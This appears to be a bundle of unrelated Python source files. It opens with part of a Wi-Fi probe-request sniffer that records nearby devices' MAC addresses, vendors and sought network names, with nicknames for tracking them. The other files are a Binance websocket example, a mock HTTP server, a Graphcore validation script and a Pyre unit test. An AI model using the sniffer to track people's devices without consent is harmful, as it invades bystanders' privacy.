parser.add_argument("-b", action='store_true', help='do not show \'broadcast\' requests (without ssid)')
parser.add_argument("-f", type=str, help='only show requests from the specified mac address')
parser.add_argument("--nosql", action='store_true', help='disable SQL logging completely')
parser.add_argument("--addnicks", action='store_true', help='add nicknames to mac addresses')
parser.add_argument("--flushnicks", action='store_true', help='flush nickname database')
parser.add_argument("--debug", action='store_true', help='turn debug mode on')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.d:
showDuplicates = False
else:
showDuplicates = True
if args.b:
showBroadcasts = False
else:
showBroadcasts = True
if args.nosql:
noSQL = True
else:
noSQL = False
if args.addnicks:
addNicks = True
else:
addNicks = False
if args.flushnicks:
flushNicks = True
else:
flushNicks = False
if args.debug:
debugMode = True
else:
debugMode = False
if args.f != None:
filterMode = True
filterMac = args.f
else:
filterMode = False
monitor_iface = args.interface
alreadyStopping = False
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget(devices):
sys.stdout.write("Devices found: [" + str(devices) + "]")
restart_line()
sys.stdout.flush()
print("[W] Make sure to use an interface in monitor mode!\n")
devices = []
script_path = os.path.dirname(os.path.realpath(__file__))
script_path = script_path + "/"
externalOptionsSet = False
if noSQL:
externalOptionsSet = True
print("[I] NO-SQL MODE!")
if showDuplicates == False:
externalOptionsSet = True
print("[I] Not showing duplicates...")
if showBroadcasts == False:
externalOptionsSet = True
print("[I] Not showing broadcasts...")
if filterMode == True:
externalOptionsSet = True
print("[I] Only showing requests from '" + filterMac + "'.")
if externalOptionsSet:
print()
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
if not noSQL:
# nosql
pass
def stop():
global alreadyStopping
debug("stoping called")
if not alreadyStopping:
debug("setting stopping to true")
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
return
def debug(msg):
if debugMode:
print("[DEBUG] " + msg)
def chopping():
while True:
if not alreadyStopping:
channel = 1
while channel <= 12:
os.system("iwconfig " + monitor_iface + " channel " + str(channel) + " > /dev/null 2>&1")
debug("[CHOPPER] HI IM RUNNING THIS COMMAND: " + "iwconfig " + monitor_iface + " channel " + str(channel))
debug("[CHOPPER] HI I CHANGED CHANNEL TO " + str(channel))
channel = channel + 1
time.sleep(5)
else:
debug("[CHOPPER] IM STOPPING TOO")
sys.exit()
def sniffer():
global alreadyStopping
while True:
if not alreadyStopping:
try:
debug("[SNIFFER] HI I STARTED TO SNIFF")
sniff(iface=monitor_iface, prn=PacketHandler, store=0)
except:
print("[!] An error occurred. Debug:")
print(traceback.format_exc())
print("[!] Restarting in 5 sec... Press CTRL + C to stop.")
time.sleep(5)
else:
debug("[SNIFFER] IM STOPPING TOO")
sys.exit()
def PacketHandler(pkt):
try:
debug("packethandler - called")
if pkt.haslayer(Dot11):
debug("packethandler - pkt.haslayer(Dot11)")
if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
debug("packethandler - if pkt.type")
PrintPacket(pkt)
debug("packethandler - printPacket called and done")
except KeyboardInterrupt:
debug("packethandler - keyboardinterrupt")
stop()
exit()
except:
debug("packethandler - exception")
stop()
exit()
pass
def PrintPacket(pkt):
statusWidget(len(devices))
debug("printpacket started")
ssid = pkt.getlayer(Dot11ProbeReq).info.decode("utf-8")
if ssid == "":
nossid = True
debug("no ssid in request... skipping")
debug(str(pkt.addr2) + " " + str(pkt.addr1))
else:
nossid = False
print_source = pkt.addr2
url = "https://macvendors.co/api/vendorname/"
# Mac address to lookup vendor from
mac_address = print_source
try:
debug("url request started")
request = urllib2.Request(url + mac_address, headers={'User-Agent': "API Browser"})
response = urllib2.urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
except KeyboardInterrupt:
stop()
exit()
except:
vendor = "No Vendor (INTERNET ERROR)"
inDevices = False
for device in devices:
if device == mac_address:
inDevices = True
if not inDevices:
devices.append(mac_address)
debug("vendor request done")
nickname = getNickname(print_source)
if filterMode:
if mac_address != filterMac:
return
if not nossid:
try:
debug("sql duplicate check started")
if not noSQL:
if not checkSQLDuplicate(ssid, mac_address):
debug("not duplicate")
debug("saving to sql")
saveToMYSQL(mac_address, vendor, ssid)
debug("saved to sql")
if nickname == False:
print(print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
else:
if showDuplicates:
debug("duplicate")
if nickname == False:
print("[D] " + print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print("[D] " + print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
else:
if nickname == False:
print(print_source + " (" + vendor + ") ==> '" + ssid + "'")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> '" + ssid + "'")
except KeyboardInterrupt:
stop()
exit()
except:
pass
else:
if showBroadcasts:
if nickname == False:
print(print_source + " (" + vendor + ") ==> BROADCAST")
else:
print(print_source + " [" + str(nickname) + "]" + " (" + vendor + ") ==> BROADCAST")
statusWidget(len(devices))
def SQLConncetor():
try:
debug("sqlconnector called")
global db
db = sqlite3.connect("DB-probeSniffer.db")
cursor = db.cursor()
return cursor
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN SQLConncetor")
debug(traceback.format_exc())
pass
def checkSQLDuplicate(ssid, mac_add):
try:
debug("[1] checkSQLDuplicate called")
cursor = SQLConncetor()
cursor.execute("select count(*) from probeSniffer where ssid = ? and mac_address = ?", (ssid, mac_add))
data = cursor.fetchall()
data = str(data)
debug("[2] checkSQLDuplicate data: " + str(data))
db.close()
if data == "[(0,)]":
return False
else:
return True
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN checkSQLDuplicate")
debug(traceback.format_exc())
pass
def saveToMYSQL(mac_add, vendor, ssid):
try:
debug("saveToMYSQL called")
cursor = SQLConncetor()
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
cursor.execute("INSERT INTO probeSniffer VALUES (?, ?, ?, ?)", (mac_add, vendor, ssid, st))
db.commit()
db.close()
except KeyboardInterrupt:
stop()
exit()
except:
debug("[!!!] CRASH IN saveToMYSQL")
debug(traceback.format_exc())
pass
def setNickname(mac, nickname):
debug("setNickname called")
cursor = SQLConncetor()
cursor.execute("INSERT INTO probeSnifferNicknames VALUES (?, ?)", (mac, nickname))
db.commit()
db.close()
def getNickname(mac):
debug("getNickname called")
cursor = SQLConncetor()
cursor.execute("SELECT nickname FROM probeSnifferNicknames WHERE mac = ?", (mac,))
data = cursor.fetchone()
db.close()
if data == None:
return False
else:
data = data[0]
data = str(data)
return data
def main():
global alreadyStopping
if not noSQL:
print("[I] Setting up SQLite...")
try:
setupDB = sqlite3.connect("DB-probeSniffer.db")
except:
print("\n[!] Cant connect to database. Permission error?\n")
exit()
setupCursor = setupDB.cursor()
if flushNicks:
try:
setupCursor.execute("DROP TABLE probeSnifferNicknames")
print("\n[I] Nickname database flushed.\n")
except:
print("\n[!] Cant flush nickname database, since its not created yet\n")
setupCursor.execute("CREATE TABLE IF NOT EXISTS probeSniffer (mac_address VARCHAR(50),vendor VARCHAR(50),ssid VARCHAR(50),date VARCHAR(50))")
setupCursor.execute("CREATE TABLE IF NOT EXISTS probeSnifferNicknames (mac VARCHAR(50),nickname VARCHAR(50))")
setupDB.commit()
setupDB.close()
if addNicks:
print("\n[NICKNAMES] Add nicknames to mac addresses.")
while True:
print()
mac = input("[?] Mac address: ")
if mac == "":
print("[!] Please enter a mac address.")
continue
nick = input("[?] Nickname for mac '" + str(mac) + "': ")
if nick == "":
print("[!] Please enter a nickname.")
continue
setNickname(mac, nick)
addAnother = input("[?] Add another nickname? Y/n: ")
if addAnother.lower() == "y" or addAnother == "":
pass
else:
break
print("[I] Starting channelhopper in a new thread...")
path = os.path.realpath(__file__)
chopper = threading.Thread(target=chopping)
chopper.daemon = True
chopper.start()
print("[I] Saving requests to 'DB-probeSniffer.db'")
print("\n[I] Sniffing started... Please wait for requests to show up...\n")
statusWidget(len(devices))
snifferthread = threading.Thread(target=sniffer)
snifferthread.daemon = True
snifferthread.start()
try:
while not alreadyStopping:
pass
except KeyboardInterrupt:
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
except OSError:
print("[!] An error occurred. Debug:")
print(traceback.format_exc())
print("[!] Restarting in 5 sec... Press CTRL + C to stop.")
try:
time.sleep(5)
except:
alreadyStopping = True
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
if not alreadyStopping:
print("\n[I] Stopping...")
if not noSQL:
print("[I] Results saved to 'DB-probeSniffer.db'")
print("\n[I] probeSniffer stopped.")
if __name__ == "__main__":
main()
|
example_userdata_stream_new_style.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream_new_style.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com = BinanceWebSocketApiManager(exchange="binance.com")
# create the userData streams
user_stream_id = ubwa_com.create_stream('arr', '!userData', api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com,))
worker_thread.start()
# configure api key and secret for binance.com Isolated Margin
api_key = ""
api_secret = ""
# create instances of BinanceWebSocketApiManager
ubwa_com_im = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData streams
user_stream_id_im = ubwa_com_im.create_stream('arr', '!userData', symbols="trxbtc", api_key=api_key, api_secret=api_secret)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com_im,))
worker_thread.start()
# monitor the streams
while True:
ubwa_com.print_stream_info(user_stream_id)
ubwa_com_im.print_stream_info(user_stream_id_im)
time.sleep(1)
|
MockServer.py
|
import http.server
from threading import Thread, Barrier
from functools import partial
class _WebMockServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass # avoid logging
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes("Example", "utf8"))
class MockServer(object):
def __init__(self):
self.__server = None
self.__thread = None
def start_mock_server(self, port: int):
print("Starting server on port", port)
self.__server = http.server.HTTPServer(("", port), _WebMockServer)
def serve_forever(server):
with server:
server.serve_forever()
self.__thread = Thread(target=serve_forever, args=(self.__server, ))
self.__thread.setDaemon(True)
self.__thread.start()
def stop_mock_server(self):
print("Stopping server")
if self.__server is not None:
self.__server.shutdown()
self.__thread.join()
self.__server = None
self.__thread = None
|
validation.py
|
# Copyright (c) 2019 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The validation code used in train.py.
This script can also be called to run validation on previously generated checkpoints.
See the README for more information.
"""
import tensorflow as tf
import os
import re
import time
import json
import argparse
import sys
import csv
from collections import OrderedDict
import importlib
from glob import glob
from pathlib import Path
import threading
import train
import log as logging
from Datasets import data as dataset
from Datasets import imagenet_dataset
from tensorflow.python import ipu
from ipu_utils import get_config
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.ipu import loops, ipu_infeed_queue, ipu_outfeed_queue
import tensorflow.contrib.compiler.xla as xla
from tensorflow.python.ipu.ops import cross_replica_ops
from tensorflow.python.ipu import horovod as hvd
import popdist
import popdist.tensorflow
import configurations
import relative_timer
DATASET_CONSTANTS = dataset.DATASET_CONSTANTS
MLPERF_EVAL_TARGET = 75.9
class LatencyThread:
def __init__(self, valid, total_batches):
self.thread = None
self.valid = valid
self.total_batches = total_batches
self.latency_sum = 0.
self.start = self.__fake_start
self.__start_if_not_compiled = self.__real_start
def __fake_start(self):
pass
def __real_start(self):
self.thread = threading.Thread(target=self.compute_latency)
self.thread.start()
def __setup_real_start(self):
self.start = self.__real_start
self.__start_if_not_compiled = self.__fake_start
def join(self):
# call to first join indicates compilation complete
# call start thread and setup real start
self.__start_if_not_compiled()
self.__setup_real_start()
self.thread.join()
def compute_latency(self):
num_batches = 0
self.latency_sum = 0
while num_batches < self.total_batches:
latencies = self.valid.session.run(self.valid.ops['latency_per_batch'])
num_batches += latencies.shape[0]
self.latency_sum += latencies.sum()
def get_latency(self):
return self.latency_sum/self.total_batches if self.total_batches != 0 else -0.001
def validation_graph_builder(model, data_dict, opts):
train.ipuside_preprocessing(data_dict, opts, training=False)
image, label = data_dict['image'], data_dict['label']
logits = model(opts, training=False, image=image)
predictions = tf.argmax(logits, 1, output_type=tf.int32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predictions, label), tf.float16))
return accuracy
def validation_graph(model, opts):
if "no_reconfigure" in opts and opts["no_reconfigure"]:
reconfigure = False
else:
reconfigure = True
if opts['use_popdist'] and reconfigure:
hvd.init()
valid_graph = tf.Graph()
with valid_graph.as_default():
# datasets must be defined outside the ipu device scope
valid_dataset = dataset.data(opts, is_training=False).map(lambda x: {'data_dict': x})
valid_iterator = ipu_infeed_queue.IPUInfeedQueue(valid_dataset,
prefetch_depth=opts['prefetch_depth'])
if opts['latency']:
timestamp_queue = ipu_outfeed_queue.IPUOutfeedQueue()
with ipu_scope('/device:IPU:0'):
def comp_fn():
def body(total_accuracy, data_dict):
accuracy = validation_graph_builder(model, data_dict, opts)
if opts['latency']:
timestamp_enqueue = timestamp_queue.enqueue(data_dict['timestamp'])
return (total_accuracy + (tf.cast(accuracy, tf.float32) / opts["validation_batches_per_step"]),
timestamp_enqueue)
else:
return total_accuracy + (tf.cast(accuracy, tf.float32) / opts["validation_batches_per_step"])
accuracy = loops.repeat(int(opts["validation_batches_per_step"]),
body, [tf.constant(0, tf.float32)], valid_iterator)
if opts['total_replicas']*opts['shards'] > 1 and not opts.get('inference', False):
accuracy = cross_replica_ops.cross_replica_sum(accuracy) / (opts['total_replicas']*opts['shards'])
return accuracy
(accuracy,) = xla.compile(comp_fn, [])
accuracy = 100 * accuracy
if opts['latency']:
print(f'relative_timer start {relative_timer.get_start()}')
timestamp = tf.cast(tf.timestamp() - relative_timer.get_start(), tf.float32)
latency_per_batch = tf.reshape(timestamp - timestamp_queue.dequeue(), [-1])
else:
latency_per_batch = None
valid_saver = tf.train.Saver()
ipu.utils.move_variable_initialization_to_cpu()
valid_init = tf.global_variables_initializer()
if opts['use_popdist']:
broadcast_weights = []
for var in tf.global_variables():
broadcast_weights.append(var.assign(hvd.broadcast(var, root_rank=0)))
total_batch_size_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_total_batch_size = hvd.broadcast(total_batch_size_ph, root_rank=0)
num_files_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_num_files = hvd.broadcast(num_files_ph, root_rank=0)
iteration_ph = tf.placeholder(dtype=tf.int32, shape=())
broadcast_iteration = hvd.broadcast(iteration_ph, root_rank=0)
else:
broadcast_weights = None
broadcast_total_batch_size, total_batch_size_ph = None, None
broadcast_num_files, num_files_ph = None, None
broadcast_iteration, iteration_ph = None, None
globalAMP = None
if opts["available_memory_proportion"] and len(opts["available_memory_proportion"]) == 1:
globalAMP = opts["available_memory_proportion"][0]
ipu_options = get_config(ipu_id=opts["select_ipu"],
prng=False, # Randomness in validation decreases performance!
shards=opts['shards'],
number_of_replicas=opts['total_replicas'],
max_cross_replica_buffer_size=opts["max_cross_replica_buffer_size"],
fp_exceptions=opts["fp_exceptions"],
half_partials=opts["enable_half_partials"],
conv_dithering=opts["enable_conv_dithering"],
enable_recomputation=opts["enable_recomputation"],
seed=opts["seed"],
availableMemoryProportion=globalAMP,
stable_norm=opts["stable_norm"],
compile_only=opts["compile_only"],
internalExchangeOptimisationTarget=opts[
"internal_exchange_optimisation_target"
],
num_io_tiles=opts["num_io_tiles"],
number_of_distributed_batch_norm_replicas=opts.get("BN_span", 1),
nanoo=not opts["saturate_on_overflow"],
)
if opts['use_popdist'] and reconfigure:
ipu_options = popdist.tensorflow.set_ipu_config(ipu_options, opts['shards'], configure_device=False)
if opts['on_demand'] and reconfigure:
ipu_options.device_connection.enable_remote_buffers = True
ipu_options.device_connection.type = ipu.utils.DeviceConnectionType.ON_DEMAND
if reconfigure:
ipu_options.configure_ipu_system()
valid_sess = tf.Session(graph=valid_graph, config=tf.ConfigProto())
ops = {'accuracy': accuracy,
'broadcast_weights': broadcast_weights,
'broadcast_total_batch_size': broadcast_total_batch_size,
'broadcast_num_files': broadcast_num_files,
'broadcast_iteration': broadcast_iteration,
'latency_per_batch': latency_per_batch}
placeholders = {'total_batch_size': total_batch_size_ph,
'num_files': num_files_ph,
'iteration': iteration_ph}
valid_graph.finalize()
return train.GraphOps(valid_graph, valid_sess, valid_init, ops, placeholders, valid_iterator, None, valid_saver)
def validation_run(valid, filepath, i, epoch, first_run, opts, latency_thread):
run = True
if filepath:
valid.saver.restore(valid.session, filepath)
name = filepath.split('/')[-1]
csv_path = os.path.join(opts['logs_path'], 'validation.csv')
if os.path.exists(csv_path):
with open(csv_path, 'rU') as infile:
# read the file as a dictionary for each row ({header : value})
reader = csv.DictReader(infile)
for row in reader:
if row['name'] == name:
run = False
print('Skipping validation run on checkpoint: {}'.format(name))
break
else:
name = None
if run:
if opts['use_popdist']:
# synchronise the model weights across all instances
valid.session.run(valid.ops['broadcast_weights'])
logging.mlperf_logging(key="EVAL_START", log_type="start",
metadata={"epoch_num": round(epoch)})
# Gather accuracy statistics
accuracy = 0.0
# start latency thread
latency_thread.start()
start = relative_timer.now()
for __ in range(opts["validation_iterations"]):
try:
a = valid.session.run(valid.ops['accuracy'])
except tf.errors.OpError as e:
if opts['compile_only'] and 'compilation only' in e.message:
print("Validation graph successfully compiled")
print("Exiting...")
sys.exit(0)
raise tf.errors.ResourceExhaustedError(e.node_def, e.op, e.message)
accuracy += a
val_time = relative_timer.now() - start
accuracy /= opts["validation_iterations"]
# wait for all dequeues and latency computation
latency_thread.join()
latency = latency_thread.get_latency()
valid_format = (
"Validation top-1 accuracy [{name}] (iteration: {iteration:6d}, epoch: {epoch:6.2f}, img/sec: {img_per_sec:6.2f},"
" time: {val_time:8.6f}, latency (ms): {latency:8.4f},"
" raw accuracy: {raw_acc:6.3f}%): {val_acc:6.3f}%")
val_size = (opts["validation_iterations"] *
opts["validation_batches_per_step"] *
opts["validation_total_batch_size"])
count = int(DATASET_CONSTANTS[opts['dataset']]['NUM_VALIDATION_IMAGES'])
raw_accuracy = accuracy
if count < val_size:
accuracy = accuracy * val_size / count
stats = OrderedDict([
('name', name),
('iteration', i),
('epoch', epoch),
('val_acc', accuracy),
('raw_acc', raw_accuracy),
('val_time', val_time),
('val_size', val_size),
('img_per_sec', val_size / val_time),
('latency', latency * 1000),
])
logging.print_to_file_and_screen(valid_format.format(**stats), opts)
logging.write_to_csv(stats, first_run, False, opts)
if opts["wandb"] and opts["distributed_worker_index"] == 0:
logging.log_to_wandb(stats)
logging.mlperf_logging(key="EVAL_STOP", log_type="stop",
metadata={"epoch_num": round(epoch)})
logging.mlperf_logging(
key="EVAL_ACCURACY", value=float(stats["val_acc"])/100,
metadata={"epoch_num": round(epoch)})
return stats
def initialise_validation(model, opts):
# -------------- BUILD GRAPH ------------------
valid = validation_graph(model.Model, opts)
# ------------- INITIALIZE SESSION -----------
valid.session.run(valid.iterator.initializer)
with valid.graph.as_default():
valid.session.run(valid.init)
return valid
def validation_only_process(model, opts):
valid = initialise_validation(model, opts)
ckpt_pattern_idx = re.compile(".*ckpt-([0-9]+).index$")
ckpt_pattern = re.compile(".*ckpt-([0-9]+)$")
if opts["restore_path"] and opts['distributed_worker_index'] == 0:
if os.path.isdir(opts["restore_path"]):
# search to a maximum depth of 1
ckpts = glob(os.path.join(opts["restore_path"], '*.index')) \
+ glob(os.path.join(opts["restore_path"], 'ckpt', '*.index'))
training_ckpts = sorted([c for c in ckpts if ckpt_pattern_idx.match(c)],
key=lambda x: int(ckpt_pattern_idx.match(x).groups()[0]))
weight_avg_ckpts = [c for c in ckpts if not ckpt_pattern_idx.match(c)]
filenames = training_ckpts + weight_avg_ckpts
filenames = [f[:-len(".index")] for f in filenames]
else:
filenames = sorted([f[:-len(".index")] for f in glob(opts['restore_path'] + '*.index')])
possible_args = os.path.join(opts["restore_path"], 'arguments.json')
if os.path.isfile(possible_args):
with open(os.path.join(opts["restore_path"], 'arguments.json'), 'r') as fp:
try:
total_batch_size = json.load(fp)['total_batch_size']
except KeyError:
total_batch_size = opts['batch_size']
else:
total_batch_size = opts['batch_size']
else:
filenames = [None]
total_batch_size = opts['batch_size']
num_files = len(filenames)
if opts['use_popdist']:
total_batch_size, num_files = valid.session.run(
[valid.ops['broadcast_total_batch_size'],
valid.ops['broadcast_num_files']],
feed_dict={valid.placeholders['total_batch_size']: total_batch_size,
valid.placeholders['num_files']: num_files}
)
if opts['distributed_worker_index'] == 0:
print(filenames)
total_samples = (opts['replicas'] *
opts['shards'] *
opts['validation_batches_per_step'] *
opts["validation_iterations"]
if opts['latency'] else 0)
latency_thread = LatencyThread(valid, total_samples)
success = False
# Validation block
logging.mlperf_logging(key="BLOCK_START", log_type="start",
metadata={"first_epoch_num": 1,
"epoch_count": opts["epochs"]}
)
for i in range(num_files):
if opts['distributed_worker_index'] == 0:
filename = filenames[i]
print(filename)
if filename:
valid.saver.restore(valid.session, filename)
pattern_match = ckpt_pattern.match(filename)
if pattern_match:
iteration = int(pattern_match.groups()[0])
else:
iteration = -1
else:
print("Warning: no restore point found - randomly initialising weights instead")
valid.session.run(valid.init)
iteration = 0
else:
iteration = 0
if opts['use_popdist']:
iteration = valid.session.run(valid.ops['broadcast_iteration'],
feed_dict={valid.placeholders['iteration']: iteration})
epoch = float(total_batch_size * iteration) / DATASET_CONSTANTS[opts['dataset']]['NUM_IMAGES']
for r in range(opts["repeat"]):
stats = validation_run(valid, None, iteration, epoch, i == 0, opts, latency_thread)
# Handle skipped case
if stats and "val_size" in stats and "val_acc" in stats:
if stats["val_acc"] > MLPERF_EVAL_TARGET:
success = True
logging.mlperf_logging(key="BLOCK_STOP", log_type="stop",
metadata={"first_epoch_num": 1}
)
logging.mlperf_logging(key="RUN_STOP",
value={"success": success},
metadata={"epoch_num": round(epoch),
"status": "success" if success else "aborted"})
def add_main_arguments(parser):
group = parser.add_argument_group('Main')
group.add_argument('--model', default='resnet', help="Choose model")
group.add_argument('--restore-path', type=str,
help="Path to a single checkpoint to restore from or directory containing multiple checkpoints")
group.add_argument('--repeat', type=int, default=1,
help="Repeat validation for debugging puposes")
group.add_argument('--inference', type=bool, default=False,
help="""Run in inference mode, disabling accuracy all-reduce between replicas.
Useful for benchmarking.""")
group.add_argument('--help', action='store_true', help='Show help information')
return parser
def set_main_defaults(opts):
opts['summary_str'] = "\n"
def set_validation_defaults(opts):
if not opts['validation']:
opts['summary_str'] += "No Validation\n"
else:
opts['validation_total_batch_size'] = opts['batch_size']*opts['shards']*opts['replicas']*opts['distributed_worker_count']
opts['summary_str'] += "Validation\n Batch Size: {}\n".format("{validation_total_batch_size}")
opts["validation_iterations"] = (
(int(DATASET_CONSTANTS[opts['dataset']]['NUM_VALIDATION_IMAGES']) + 128) //
opts["validation_total_batch_size"]) + 1
if opts["batches_per_step"] < opts["validation_iterations"]:
opts["validation_batches_per_step"] = int(opts["validation_iterations"] //
int(round(opts["validation_iterations"] / opts['batches_per_step'])))
opts["validation_iterations"] = int((opts["validation_iterations"] +
opts["validation_batches_per_step"] - 1) / opts["validation_batches_per_step"])
else:
opts["validation_batches_per_step"] = opts["validation_iterations"]
opts["validation_iterations"] = 1
def create_parser(model, parser):
parser = model.add_arguments(parser)
parser = dataset.add_arguments(parser)
parser = train.add_training_arguments(parser)
parser = train.add_ipu_arguments(parser)
parser = logging.add_arguments(parser)
return parser
def set_distribution_defaults(opts):
if opts['use_popdist']:
opts['distributed_worker_count'] = popdist.getNumInstances()
opts['distributed_worker_index'] = popdist.getInstanceIndex()
opts['distributed_cluster'] = None
opts['summary_str'] += 'Popdist\n'
opts['summary_str'] += ' Process count: {distributed_worker_count}\n'
opts['summary_str'] += ' Process index: {distributed_worker_index}\n'
else:
opts['distributed_worker_count'] = 1
opts['distributed_worker_index'] = 0
opts['distributed_cluster'] = None
def set_defaults(model, opts):
set_main_defaults(opts)
dataset.set_defaults(opts)
model.set_defaults(opts)
set_distribution_defaults(opts)
set_validation_defaults(opts)
train.set_ipu_defaults(opts)
logging.set_defaults(opts)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Validation for previously generated checkpoints.', add_help=False)
parser = add_main_arguments(parser)
parser = configurations.add_arguments(parser)
args, unknown = parser.parse_known_args()
args = configurations.parse_config(args, parser, known_args_only=True)
args = vars(args)
try:
model = importlib.import_module("Models." + args['model'])
except ImportError:
raise ValueError('Models/{}.py not found'.format(args['model']))
parser = create_parser(model, parser)
opts = parser.parse_args()
opts = configurations.parse_config(opts, parser)
opts = vars(opts)
print(opts)
if args['help']:
parser.print_help()
else:
if popdist.isPopdistEnvSet():
opts['use_popdist'] = True
opts['replicas'] = popdist.getNumLocalReplicas()
opts['total_replicas'] = popdist.getNumTotalReplicas()
opts['select_ipu'] = str(popdist.getDeviceId())
else:
opts['use_popdist'] = False
opts['total_replicas'] = opts['replicas']
opts["command"] = ' '.join(sys.argv)
set_defaults(model, opts)
if opts['dataset'] == 'imagenet':
if opts['image_size'] is None:
opts['image_size'] = 224
elif 'cifar' in opts['dataset']:
opts['image_size'] = 32
if opts["wandb"] and opts["distributed_worker_index"] == 0:
logging.initialise_wandb(opts)
logging.print_to_file_and_screen("Command line: " + opts["command"], opts)
logging.print_to_file_and_screen(opts["summary_str"].format(**opts), opts)
opts["summary_str"] = ""
logging.print_to_file_and_screen(opts, opts)
validation_only_process(model, opts)
|
project_files_monitor_test.py
|
# Copyright (c) 2019-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import language_server_protocol, project_files_monitor
from ..filesystem import UpdatedPaths
from ..language_server_protocol import (
LanguageServerProtocolMessage,
read_message,
write_message,
)
from ..project_files_monitor import Monitor, MonitorException, SocketConnection
class MonitorTest(unittest.TestCase):
@patch.object(language_server_protocol, "perform_handshake")
@patch.object(Monitor, "_connect_to_socket")
@patch.object(project_files_monitor, "find_root")
def test_subscriptions(self, find_root, _connect_to_socket, perform_handshake):
find_root.return_value = "/ROOT"
arguments = MagicMock()
configuration = MagicMock()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = Monitor(arguments, configuration, analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:3],
["allof", ["type", "f"], ["not", "empty"]],
)
self.assertCountEqual(
subscription.subscription["expression"][3],
["anyof", ["suffix", "py"], ["suffix", "pyi"]],
)
# additional extensions
